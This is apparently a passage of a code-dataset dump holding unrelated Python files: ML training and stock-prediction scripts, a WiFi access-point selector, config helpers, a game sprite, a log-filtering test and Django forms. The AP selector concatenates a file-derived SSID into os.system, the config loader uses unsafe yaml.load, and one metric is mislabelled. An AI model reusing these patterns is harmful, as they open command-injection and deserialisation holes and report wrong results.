(h:mm:ss)\".format(format_time(time.time()-total_t0)))\r\n\r\n pd.set_option('precision', 4)\r\n df_stats = pd.DataFrame(data=training_stats)\r\n df_stats = df_stats.set_index('epoch')\r\n df_stats.head(5)\r\n","sub_path":"test_dynamicloader.py","file_name":"test_dynamicloader.py","file_ext":"py","file_size_in_byte":30594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"147961349","text":"# ************Decision Tree***************** /\n#___________________________________________________________/\n__author__ = \"EA\"\n# -*- coding: utf-8 -*-\n\nfrom feature_selector import FeatureSelector\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\n\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import log_loss\nfrom sklearn.model_selection import GridSearchCV\n\n#Tree visualization library\n# from sklearn.externals.six import StringIO\n# from IPython.display import Image\n# from sklearn.tree import export_graphviz\n# import pydotplus\nimport json\nfrom Models import utils\n\n\n\n#***********Data spliting\n\ndef splitData(dataFrame, trainTestValidation):\n\n X=dataFrame.iloc[:,:-1].values\n y=dataFrame.iloc[:,-1].values\n #***************Split data into train,test\n\n if(trainTestValidation != None):\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=trainTestValidation['test_size'], random_state=1)\n\n #***************split train again into validation and train\n X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=trainTestValidation['validation_size'], random_state=1)\n\n return X_train, y_train, X_val, y_val, X_test, y_test\n\n\n\ndef TrainingDefaultParameters(X_train, y_train):\n\n clf = RandomForestClassifier()\n clf.fit(X_train,y_train)\n return clf\n\n\ndef TrainingFine_tunning(X_train, y_train,parameters):\n if(parameters != None):\n clf = RandomForestClassifier()\n clf.set_params(**parameters)\n clf.fit(X_train,y_train)\n return clf\n\n\n\n#***************************Auto-tuning : choix automatique des macro-paramètres de Decision Tree\n#________________________________________________________________________________________________|\n\n\ndef autotuning(X_train, y_train):\n\n\n parameters={'min_samples_split' : range(5,500,20),'max_depth': range(1,20,2)}\n clf_tree=RandomForestClassifier()\n clf=GridSearchCV(clf_tree,parameters)\n clf.fit(X_train,y_train)\n #print(clf.best_estimator_)\n trained_model=clf.best_estimator_.fit(X_train,y_train)\n return trained_model\n\n\n#**************************Make prediction\n#__________________________________________|\ndef testSetPrediction(X_test,X_val,clf):\n\n predict_test=clf.predict(X_test)\n predict_val=clf.predict(X_val)\n return predict_test,predict_val\n\n\n\n#**************************Evaluation\n#____________________________________|\ndef scoring(y_test,predict_test,y_val,predict_val):\n\n data={}\n\n data[\"accuracy_score_Test\"] = accuracy_score(y_test,predict_test)\n data[\"roc_auc_score_Test\"] = log_loss(y_test,predict_test)\n\n\n data[\"accuracy_score_Val\"] = accuracy_score(y_val,predict_val)\n \n return data\n# #Variable Selection\n# def feature_selector(dataFrame,train_labels):\n\n# fs = FeatureSelector(data = dataFrame, labels = train_labels)\n# fs.identify_missing(missing_threshold = 0.6)\n\n# '''This method finds pairs of collinear features based on the Pearson correlation coefficient.\n# For each pair above the specified threshold (in terms of absolute value),\n# it identifies one of the variables to be removed. '''\n\n# fs.identify_collinear(correlation_threshold = 0.98)\n# fs.identify_zero_importance(task = 'regression',\n# eval_metric = 'auc',\n# n_iterations = 10,\n# early_stopping = True)\n\n# # list of zero importance features\n# zero_importance_features = fs.ops['zero_importance']\n\n# #we have identified the features to remove: feature with missing values, feauture with low importance\n# train_no_missing_zero = fs.remove(methods = ['missing', 'zero_importance'])\n\n# all_to_remove = fs.check_removal()\n\n# return train_no_missing_zero\n\n# def visualization(dtree):\n# dot_data = StringIO()\n# export_graphviz(dtree, out_file=dot_data,\n# filled=True, rounded=True,\n# special_characters=True)\n# graph = pydotplus.graph_from_dot_data(dot_data.getvalue())\n# image=Image(graph.create_png())\n# utils.ensure_dir(\"output/visualisation\")\n# Image(graph.write_png('output/visualisation/Tree_visu.png'))\n# return image\n","sub_path":"Models/RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"153299146","text":"import Ind\r\nimport pandas as pd\r\ndata=pd.read_excel('data.xlsx')\r\nMA= Ind.MA(data,5,10,20) \r\nmacd=Ind.MACD(data)\r\nkdj=Ind.KDJ(data,9)\r\nrsi6=Ind.RSI(data,6)\r\nrsi12=Ind.RSI(data,12)\r\nrsi24=Ind.RSI(data,24)\r\nbias5=Ind.BIAS(data,5)\r\nbias10=Ind.BIAS(data,10)\r\nbias20=Ind.BIAS(data,20)\r\nobv=Ind.OBV(data) \r\ny=Ind.cla(data)\r\n\r\n#将计算出的技术指标与交易日期以及股价的涨跌趋势利用字典整合在一起\r\npm={'交易日期':data['Trddt'].values}\r\nPM=pd.DataFrame(pm)\r\nDF={'MA5':MA[0],'MA10':MA[1],'MA20':MA[2],'MACD':macd,\r\n 'K':kdj[0],'D':kdj[1],'J':kdj[2],'RSI6':rsi6,'RSI12':rsi12,\r\n 'RSI24':rsi24,'BIAS5':bias5,'BIAS10':bias10,'BIAS20':bias20,'OBV':obv}\r\nDF=pd.DataFrame(DF)\r\ns1=PM.join(DF)\r\n\r\ny1={'涨跌趋势':y}\r\nZZ=pd.DataFrame(y1)\r\ns2=s1.join(ZZ)\r\n\r\n#去掉空值\r\nss=s2.dropna()\r\n#将ss中第6列不为0的值提取出来,存放到Data中\r\nData=ss[ss.iloc[:,6].values!=0]\r\n\r\n #提取训练和预测数据\r\nx1=Data['交易日期']>='2017-01-01'\r\nx2=Data['交易日期']<='2017-11-30'\r\nxx=x1&x2\r\nindex=xx.values==True\r\nindex1=xx.values==False\r\nx_train=Data.iloc[index,1:15] \r\ny_train=Data.iloc[index,[15]]\r\nx_test=Data.iloc[index1,1:15]\r\ny_test=Data.iloc[index1,[15]]\r\n\r\n\r\n#数据标准化\r\nfrom sklearn.preprocessing import StandardScaler \r\nscaler = StandardScaler()\r\nscaler.fit(x_train) \r\nx_train=scaler.transform(x_train)\r\nx_test=scaler.transform(x_test) \r\n\r\n\r\nfrom sklearn.linear_model import LogisticRegression as LR\r\nclf = LR()\r\nclf.fit(x_train, y_train) \r\nresult=clf.predict(x_test)\r\nsc=clf.score(x_train, y_train)\r\n'''\r\nfrom sklearn.neural_network import MLPClassifier\r\nclf = MLPClassifier(solver='lbfgs', alpha=1e-5,\r\n hidden_layer_sizes=8, random_state=1)\r\n # 多个隐含层hidden_layer_sizes(5,2)\r\nclf.fit(x_train, y_train) \r\nresult=clf.predict(x_test)\r\nsc=clf.score(x_train, y_train)\r\n\r\nfrom sklearn import svm\r\nclf = svm.SVC()\r\nclf.fit(x_train, y_train) \r\nresult=clf.predict(x_test)\r\nsc=clf.score(x_train, y_train)\r\n'''\r\nresult=pd.DataFrame(result)\r\n#提取预测样本的交易日期\r\nff=Data.iloc[index1,0]\r\n#将预测结果与实践结果整合在一起,进行比较\r\npm1={'交易日期':ff.values,'预测结果':result.iloc[:,0].values,'实际结果':y_test.iloc[:,0].values}\r\nresult1=pd.DataFrame(pm1)\r\nz=result1['预测结果'].values-result1['实际结果'].values\r\nR=len(z[z==0])/len(z)\r\n\r\nr_list=[]\r\nr_trd=[]\r\nfor t in range(len(result1)-1):\r\n if result1['预测结果'].values[t]==1:\r\n p1=data.loc[data['Trddt'].values== result1['交易日期'].values[t],'Clsprc'].values\r\n dt=data.loc[data['Trddt'].values>result1['交易日期'].values[t],['Trddt','Clsprc']]\r\n dt=dt.sort_values('Trddt')\r\n p2=dt['Clsprc'].values[0]\r\n r=(p2-p1)/p1\r\n r_list.append(r)\r\n r_trd.append(result1['交易日期'].values[t])\r\nr_total=sum(r_list)\r\ntrd_r={'交易日期':r_trd,'收益率':r_list}\r\ntrd_r=pd.DataFrame(trd_r)\r\n\r\n","sub_path":"程序与数据/第9章 综合案例2:股票价格趋势预测分析/9.3~9.5.py","file_name":"9.3~9.5.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"170234376","text":"with open('BSSs', 'r') as bss_f:\n import re\n bss_pat = re.compile('\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}')\n BSSs = bss_f.read()\n BSSs = bss_pat.findall(BSSs)\n bss_f.close()\n\nwith open('SSIDs', 'r') as ssid_f:\n SSIDs = ssid_f.read()\n SSIDs = SSIDs.split('SSID: ')\n final_SSID = []\n for SSID in SSIDs:\n SSID = SSID.strip()\n if SSID != '':\n final_SSID.append(SSID)\n ssid_f.close()\n\nassert len(BSSs) == len(final_SSID)\n\nSSID_set = set()\nAP_list = []\ncount = 1\nfor i in range(len(BSSs)):\n if final_SSID[i] in SSID_set:\n continue\n print(str(count) + '\\t', end='')\n print(final_SSID[i])\n SSID_set.add(final_SSID[i])\n AP_list.append((BSSs[i], final_SSID[i]))\n count += 1\n\n\nselection = input('\\nPlease choose one AP to connect...(Input the number)\\n')\nchose = AP_list[eval(selection) - 1][1]\nprint('Connect to {}...'.format(chose))\n\nimport os\nos.system('iw dev wlan0 connect' + chose)\n\n\n","sub_path":"select_AP.py","file_name":"select_AP.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"218739707","text":"from typing import Optional\n\nfrom dcs.mission import Mission\n\nfrom game.weather import Clouds, Fog, Conditions, WindConditions\n\n\nclass EnvironmentGenerator:\n def __init__(self, mission: Mission, conditions: Conditions) -> None:\n self.mission = mission\n self.conditions = conditions\n\n def set_clouds(self, clouds: Optional[Clouds]) -> None:\n if clouds is None:\n return\n self.mission.weather.clouds_base = clouds.base\n self.mission.weather.clouds_thickness = clouds.thickness\n self.mission.weather.clouds_density = clouds.density\n self.mission.weather.clouds_iprecptns = clouds.precipitation\n\n def set_fog(self, fog: Optional[Fog]) -> None:\n if fog is None:\n return\n self.mission.weather.fog_visibility = fog.visibility\n self.mission.weather.fog_thickness = fog.thickness\n\n def set_wind(self, wind: WindConditions) -> None:\n self.mission.weather.wind_at_ground = wind.at_0m\n self.mission.weather.wind_at_2000 = wind.at_2000m\n self.mission.weather.wind_at_8000 = wind.at_8000m\n\n def generate(self):\n self.mission.start_time = self.conditions.start_time\n self.set_clouds(self.conditions.weather.clouds)\n self.set_fog(self.conditions.weather.fog)\n self.set_wind(self.conditions.weather.wind)\n","sub_path":"gen/environmentgen.py","file_name":"environmentgen.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"482391888","text":"import base64\nimport json\nimport logging\nimport os\nimport yaml\n\n\nfrom os.path import join\nfrom common.constants import CONFIG_FILE_PATH\nfrom common.constants import KEY_NETWORKER_SERVER\nCOMMON_BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\ndef decode_base64_string(encoded_data):\n \"\"\"Decode the data\n :param encoded_data: Encoded data input\n :return: Decoded string\n \"\"\"\n return str(base64.b64decode(encoded_data), 'utf-8')\n\n\ndef decode_base64_json(encoded_data):\n \"\"\"Decode the Json data\n :param encoded_data: Encoded data input\n :return: Decoded json output\n \"\"\"\n return json.loads(str(base64.b64decode(encoded_data), 'utf-8'))\n\n\ndef get_config(appliance, param, yaml_file_path=join(COMMON_BASE_DIR, CONFIG_FILE_PATH)):\n \"\"\"This function gives the yaml value corresponding to the parameter\n sample Yaml file\n xstream_details:\n xtm_host: 10.100.26.90\n :param appliance: The header name as mentioned in the yaml file (ex:xstream_details)\n :param param: The parameter name who's value is to be determined (ex: xtm_host)\n :param yaml_file_path: Path of yaml file, Default will the config.yaml file\n :return: value corresponding to the parameter in yaml file\n :except: Exception while opening or loading the file\n \"\"\"\n try:\n with open(yaml_file_path, 'r') as f:\n doc = yaml.load(f)\n param_value = doc[appliance][param]\n if param_value == \"\":\n message = 'Value is not updated for the parameter:{} in the yaml config file'\\\n .format(param)\n raise Exception(message)\n return param_value\n except Exception as ex:\n message = \"Exception: An exception occured: {}\".format(ex)\n raise Exception(message)\n\n\ndef dict_to_yaml(data_dict, yaml_file_name):\n \"\"\"Convert the Dictionary to Yaml file\n :param yaml_file_name: File name to save the yaml data\n :param data: Dictionary variable which contains key, value pairs\n :return: Boolean True or False\n \"\"\"\n logging.info('Parsing Config Files')\n try:\n with open(yaml_file_name, 'w') as outfile:\n logging.debug('Opening {}'.format(yaml_file_name))\n # Dumping the data to yaml file\n yaml.dump(data_dict, outfile, default_flow_style=False)\n logging.debug('Successfully converted the Dictionary to Yaml file')\n result_flag = True\n except FileNotFoundError:\n message = 'FileNotFoundError: No such file or directory: {}'.format(yaml_file_name)\n logging.fatal(message)\n raise Exception(message)\n except yaml.YAMLError as exc:\n message = \"Exception: An exception occured: {}\".format(exc)\n logging.fatal(message)\n raise Exception(message)\n except IOError as io_error:\n message = \"Exception: An exception occured: {}\".format(io_error)\n raise Exception(message)\n except Exception as ex:\n message = \"Exception: An exception occured: {}\".format(ex)\n raise Exception(message)\n return result_flag\n\n\ndef get_pg_for_retention_time(networker, retention_period, retention_period_type='Day'):\n \"\"\"\n :param retention_period: Number of Days/Weeks/Months/Years\n :param retention_period_type: If retentionPeriod is 11 and retentionPeriodType is\n Day then backup requested for 11 Days.\n - Default Value: 'Day'\n - Possible Values: 'Day', 'Decade', 'Month', 'Quarter', 'Week', 'Year'\n :return: Name of the Protection Group\n \"\"\"\n try:\n if str.lower(retention_period_type) not in ['day']:\n return \"Invalid type\"\n if retention_period == 15:\n protection_group = networker['pg15']\n elif retention_period == 30:\n protection_group = networker['pg30']\n else:\n return \"\"\n return protection_group\n except KeyError:\n return \"\"\n\ndef log_func_calls(log_id):\n def outer_wrap(func):\n def wrap(*args, **kwargs):\n logging.info(\"{} Inside: {}\".format(log_id, func.__name__))\n result = func(*args, **kwargs)\n logging.info(\"{} Exit: {}\".format(log_id, func.__name__))\n return result\n return wrap\n return outer_wrap\n","sub_path":"django_project/common/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"104077099","text":"import arcade\nfrom game.consts import BULLET_SCALE\nfrom game.physics import PhysicsEngineSimple\nfrom game.managers.sounds_manager import SoundsManager\n\n\nclass Bullet(arcade.Sprite):\n def __init__(self, parent, asset_path, x, y, change_x, change_y, speed):\n super().__init__(asset_path, BULLET_SCALE)\n self.parent = parent\n self.center_x = x\n self.center_y = y\n self.speed = speed\n self.change_x = change_x * speed\n self.change_y = change_y * speed\n self.physics_engine = PhysicsEngineSimple(self)\n self.map = map\n\n def update(self):\n results = self.physics_engine.check(self.parent.game.players_list)\n if len(results) > 0:\n player = results[0]\n player.on_hit()\n SoundsManager.play_sound(\"losing\")\n self.remove_from_sprite_lists()\n\n check_walls = self.physics_engine.check(self.parent.game.map.walls_layer)\n check_collidable = self.physics_engine.check(self.parent.game.map.collidable_objects_layer)\n\n if len(check_walls) + len(check_collidable) > 0:\n self.remove_from_sprite_lists()\n\n self.physics_engine.resolve()\n self.physics_engine.update()\n","sub_path":"game/enemies/bullets.py","file_name":"bullets.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"132343173","text":"# Copyright 2019 Extreme Networks, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\n\nimport os\nimport sys\nimport signal\n\nimport eventlet\nfrom eventlet.green import subprocess\n\nfrom st3tests.base import IntegrationTestCase\nfrom st3tests.fixturesloader import get_fixtures_base_path\n\n__all__ = [\n 'ServiceSetupLogLevelFilteringTestCase'\n]\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nFIXTURES_DIR = get_fixtures_base_path()\n\nST3_CONFIG_INFO_LL_PATH = os.path.join(FIXTURES_DIR, 'conf/st3.tests.api.info_log_level.conf')\nST3_CONFIG_INFO_LL_PATH = os.path.abspath(ST3_CONFIG_INFO_LL_PATH)\n\nST3_CONFIG_DEBUG_LL_PATH = os.path.join(FIXTURES_DIR, 'conf/st3.tests.api.debug_log_level.conf')\nST3_CONFIG_DEBUG_LL_PATH = os.path.abspath(ST3_CONFIG_DEBUG_LL_PATH)\n\nST3_CONFIG_AUDIT_LL_PATH = os.path.join(FIXTURES_DIR, 'conf/st3.tests.api.audit_log_level.conf')\nST3_CONFIG_AUDIT_LL_PATH = os.path.abspath(ST3_CONFIG_AUDIT_LL_PATH)\n\nST3_CONFIG_SYSTEM_DEBUG_PATH = os.path.join(FIXTURES_DIR,\n 'conf/st3.tests.api.system_debug_true.conf')\nST3_CONFIG_SYSTEM_DEBUG_PATH = os.path.abspath(ST3_CONFIG_SYSTEM_DEBUG_PATH)\n\nST3_CONFIG_SYSTEM_LL_DEBUG_PATH = os.path.join(FIXTURES_DIR,\n 'conf/st3.tests.api.system_debug_true_logging_debug.conf')\n\nPYTHON_BINARY = sys.executable\n\nST3API_BINARY = os.path.join(BASE_DIR, '../../../st3api/bin/st3api')\nST3API_BINARY = os.path.abspath(ST3API_BINARY)\n\nCMD = [PYTHON_BINARY, ST3API_BINARY, '--config-file']\n\n\nclass ServiceSetupLogLevelFilteringTestCase(IntegrationTestCase):\n def test_audit_log_level_is_filtered_if_log_level_is_not_debug_or_audit(self):\n # 1. INFO log level - audit messages should not be included\n process = self._start_process(config_path=ST3_CONFIG_INFO_LL_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(3)\n process.send_signal(signal.SIGKILL)\n\n # First 3 log lines are debug messages about the environment which are always logged\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n self.assertTrue('INFO [-]' in stdout)\n self.assertTrue('DEBUG [-]' not in stdout)\n self.assertTrue('AUDIT [-]' not in stdout)\n\n # 2. DEBUG log level - audit messages should be included\n process = self._start_process(config_path=ST3_CONFIG_DEBUG_LL_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(5)\n process.send_signal(signal.SIGKILL)\n\n # First 3 log lines are debug messages about the environment which are always logged\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n self.assertTrue('INFO [-]' in stdout)\n self.assertTrue('DEBUG [-]' in stdout)\n self.assertTrue('AUDIT [-]' in stdout)\n\n # 3. AUDIT log level - audit messages should be included\n process = self._start_process(config_path=ST3_CONFIG_AUDIT_LL_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(5)\n process.send_signal(signal.SIGKILL)\n\n # First 3 log lines are debug messages about the environment which are always logged\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n self.assertTrue('INFO [-]' not in stdout)\n self.assertTrue('DEBUG [-]' not in stdout)\n self.assertTrue('AUDIT [-]' in stdout)\n\n # 2. INFO log level but system.debug set to True\n process = self._start_process(config_path=ST3_CONFIG_SYSTEM_DEBUG_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(5)\n process.send_signal(signal.SIGKILL)\n\n # First 3 log lines are debug messages about the environment which are always logged\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n')[3:])\n\n self.assertTrue('INFO [-]' in stdout)\n self.assertTrue('DEBUG [-]' in stdout)\n self.assertTrue('AUDIT [-]' in stdout)\n\n def test_kombu_heartbeat_tick_log_messages_are_excluded(self):\n # 1. system.debug = True config option is set, verify heartbeat_tick message is not logged\n process = self._start_process(config_path=ST3_CONFIG_SYSTEM_LL_DEBUG_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(5)\n process.send_signal(signal.SIGKILL)\n\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n'))\n self.assertTrue('heartbeat_tick' not in stdout)\n\n # 2. system.debug = False, log level is set to debug\n process = self._start_process(config_path=ST3_CONFIG_DEBUG_LL_PATH)\n self.add_process(process=process)\n\n # Give it some time to start up\n eventlet.sleep(5)\n process.send_signal(signal.SIGKILL)\n\n stdout = '\\n'.join(process.stdout.read().decode('utf-8').split('\\n'))\n self.assertTrue('heartbeat_tick' not in stdout)\n\n def _start_process(self, config_path):\n cmd = CMD + [config_path]\n cwd = os.path.abspath(os.path.join(BASE_DIR, '../../../'))\n cwd = os.path.abspath(cwd)\n process = subprocess.Popen(cmd, cwd=cwd,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n shell=False, preexec_fn=os.setsid)\n return process\n","sub_path":"tests/integration/test_service_setup_log_level_filtering.py","file_name":"test_service_setup_log_level_filtering.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"154711450","text":"import numpy as np\nimport Bleko_pol\nfrom scipy.integrate import solve_bvp\nimport scipy.integrate as integrate\nfrom scipy.integrate import quad\nimport matplotlib.pyplot as plt\nimport matplotlib as plt\nimport math as math\n\n\nN = 1000\nN_plot=100\n\nBleko_pol.k = 1\n\nrho_0 = 0.1\nBleko_pol.rho_0 = rho_0\n\n\nxi_s=0.01\nxi_f=2.5\nxi = 0.3\nBleko_pol.xi = xi\n\n\nbeta = 0.3\nBleko_pol.beta=beta\nalpha = 0.25\nBleko_pol.alpha = alpha\n\nrho = np.linspace(rho_0, 1, N)\nBleko_pol.rho=rho\n\ndef f(rho,y):\n return np.array (Bleko_pol.forSOE(rho, y[0], y[1]))\n\n\ndef bc (ya, yb):\n return np.array (Bleko_pol.forBC(ya[0], ya[1],yb[0], yb[1]))\n \n\ndef Mom(xi):\n Bleko_pol.xi = xi\n y1= rho\n y2 = np.ones(N)\n y_approx = np.array([y1, y2])\n res_a = solve_bvp(f, bc, rho, y_approx)\n y_plot_a = res_a.sol(rho)[0]\n \n y = list(map(Bleko_pol.forIntegrand, y_plot_a))\n return (integrate.simps(y,rho))\n\nprint(Mom(0.3))\n\nimport matplotlib.pyplot as plt\npoints_xi = np.linspace(xi_s,xi_f,N_plot)\npoints_M = list(map(Mom, points_xi))\nplt.plot(points_xi, points_M)\nplt.ylabel('Mom')\nplt.xlabel('xi ')\nplt.show()\n\n\n#Дима - лох","sub_path":"full/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"99117121","text":"from django import forms\nfrom django.forms import *\nfrom aplicacion.models import *\nfrom django.utils.translation import ugettext_lazy as _\nfrom django import forms\nfrom django.contrib.auth import authenticate\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(label='Usuario', max_length=50, widget=forms.TextInput(attrs={'placeholder': 'Usuario', 'class': 'form-control',}))\n password = forms.CharField(label='Clave', max_length=50, widget=forms.PasswordInput(attrs={'placeholder': 'Contraseña','class': 'form-control',}))\n\n def clean(self):\n data = self.cleaned_data\n if data.get('username') is None or data.get('password') is None:\n raise forms.ValidationError(\"Digite ambos campos:\")\n else:\n self.user = authenticate(username=data['username'], password=data['password'])\n if self.user is not None:\n # the password verified for the user\n if not self.user.is_active:\n raise forms.ValidationError(\"El usuario no se encuentra activo en el sistema.\")\n # print(\"The password is valid, but the account has been disabled!\")\n else:\n # the authentication system was unable to verify the username and password\n raise forms.ValidationError(\"La combinacion de usuario y clave no es valida.\")\n return data\n\n\nclass ClienteFrom(ModelForm):\n class Meta:\n model = Cliente\n exclude = ('eliminado',)\n widgets = {\n 'identificacion': TextInput(attrs={'placeholder': 'Identificacion', 'class': 'form-control', 'aria-describedby': 'basic-addon1', 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Identificacion', 'data-content':\"Cedula o identificacion del Cliente (1.234.567.899)\"}),\n 'nombre': TextInput(attrs={'placeholder': 'Nombre', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Nombre'}),\n 'apellido': TextInput(attrs={'placeholder': 'Apellido', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Apellido'}),\n 'fecha1': TextInput(attrs={'type': 'number', 'min':'1', 'max': '31', 'placeholder': 'Fecha de cobro 1 (dia de cada mes)', 'class': \"form-control fecha\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Fecha 1', 'data-content':\"Primera fecha de cobro\"}),\n 'fecha2': TextInput(attrs={'type': 'number', 'min':'1', 'max': '31', 'placeholder': 'Fecha de cobro 1 (dia de cada mes) (Opcional)', 'class': \"form-control fecha\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Fecha 2', 'data-content':\"Segunda fecha de cobro\"}),\n 'correo': TextInput(attrs={'placeholder': 'Correo (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Correo', 'data-content':\"E-mail para contacto del cliente (Opcional)\"}),\n 'referencia': Textarea(attrs={'placeholder': 'Referencia (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Referencia', 'data-content':\"Persona o entidades las cuales se relaciona el cliente (Opcional)\"}),\n 'empresa': TextInput(attrs={'placeholder': 'Empresa (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Empresa', 'data-content':\"Lugar de trabajo del cliente (Opcional)\"}),\n }\n error_messages = {\n 'identificacion': {\n 'required': (\"Identificacion\"),\n },\n 'nombre': {\n 'required': (\"Nombre\"),\n },\n 'apellido': {\n 'required': (\"Apellido\"),\n },\n 'fecha1':{\n 'required':(\"Fecha de cobro No.1\")\n },\n }\n\n\nclass TelefonoForm(ModelForm):\n class Meta:\n model = Telefono\n exclude = ('eliminado','cliente',)\n widgets = {\n 'telefono': TextInput(attrs={'placeholder': 'Telefono', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Telefono', 'data-content':\"Telefono fijo o celular\"})}\n error_messages = {'telefono':{'required':(\"Telefono\")}}\n\nclass DireccionForm(ModelForm):\n class Meta:\n model = Direccion\n exclude = ('eliminado','cliente',)\n widgets = {\n 'direccion': TextInput(attrs={'placeholder': 'Direccion', 'class': \"form-control\", 'data-trigger': \"hover\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'title':'Direccion', 'data-content':\"Referencia de la ubicacion a acercarce al cliente\"})}\n error_messages = {'direccion':{'required':(\"Direccion\")}}\n\n\nclass ReciboForm(ModelForm):\n class Meta:\n model = Recibo\n exclude = ('eliminado','fechaRecibo', 'compra',)\n widgets = {\n 'numeroRecibo':TextInput(attrs={'placeholder': 'Numero del Recibo', 'class': \"form-control\"}),\n 'valorAbono':TextInput(attrs={'placeholder': 'ingrese el Valor', 'class': \"form-control\", 'type': \"number\"}),\n 'formaDePago':Select(attrs={'class':'form-control'})}\n error_messages = {'numeroRecibo':{'required':(\"Numero de recibo\")},\n 'valorAbono':{'required':(\"Valor del abono\")}}\n\n\nclass FacturaForm(ModelForm):\n class Meta:\n model = Factura\n exclude = ('eliminado', 'fechaCompra','cliente',)\n widgets = {\n 'numeroFactura': NumberInput(attrs={'placeholder': 'Numero de Factura','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Numero de Factura\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Identificacion de la factura\"}),}\n error_messages = {'numeroFactura':{'required':(\"Numero de la factura\")}}\n\n\nclass DetalleFacturaForm(ModelForm):\n class Meta:\n model = DetalleFactura\n exclude = ('eliminado', 'factura','numeroDetalle')\n widgets = {\n 'cantidad': NumberInput(attrs={'placeholder': 'cantidad','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Cantidad\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Numero de items del producto a comprar\"}),\n 'grupo': Select(attrs={'class': \"form-control\", 'id':'select', 'data-trigger': \"hover\",'title':\"Numero de Factura\"}),\n 'descripcion': Textarea(attrs={'placeholder': 'Descripcion (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Descripcion\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Breve descripcion de la Compra\"}),\n\n 'numeroFactura': NumberInput(attrs={'placeholder': 'Numero de Factura','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Numero de Factura\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Identificacion de la factura\"}),\n 'cantidad': NumberInput(attrs={'placeholder': 'cantidad','class': \"form-control\", 'data-trigger': \"hover\",'title':\"Cantidad\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Numero de categorias de productos comprados\"}),\n #'grupo': Select(attrs={'class': \"form-control\", 'id':'select', 'data-trigger': \"hover\",'title':\"Numero de Factura\"}),\n #'descripcion': Textarea(attrs={'placeholder': 'Descripcion (Opcional)', 'class': \"form-control\", 'data-trigger': \"hover\",'title':\"Descripcion\", 'data-placement': \"top\", 'data-toggle': \"popover\", 'data-content':\"Breve 